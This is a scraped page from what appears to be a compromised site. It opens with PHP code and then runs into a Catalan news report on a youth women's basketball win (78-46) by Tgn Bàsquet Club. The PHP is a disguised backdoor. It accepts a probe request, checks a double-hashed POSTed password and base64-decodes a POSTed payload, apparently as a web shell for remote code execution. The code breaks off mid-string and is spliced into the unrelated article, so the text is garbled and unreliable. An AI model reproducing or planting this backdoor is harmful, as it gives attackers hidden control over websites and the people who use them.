function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 03 A derrota el Lluïsos de Gràcia i suma la desena victòria seguida (78-46) - Tgn Bàsquet Club -

El cadet femení 03 A derrota el Lluïsos de Gràcia i suma la desena victòria seguida (78-46)

Updated: novembre 20, 2018

L’equip cadet femení 03 A va aconseguir un nou triomf després de fer una molt bona actuació coral contra el Lluïsos de Gràcia. El conjunt que entrena Manuel Rubio va sortir molt bé a la pista, amb molta concentració i imprimint un alt ritme de joc que va ensorrar la resistència visitant (37-17 al descans). Tot i la reacció barcelonina en el tercer període, les liles van tornar a pressionar i a córrer i marcar un parcial en l’últim quart de 24-10.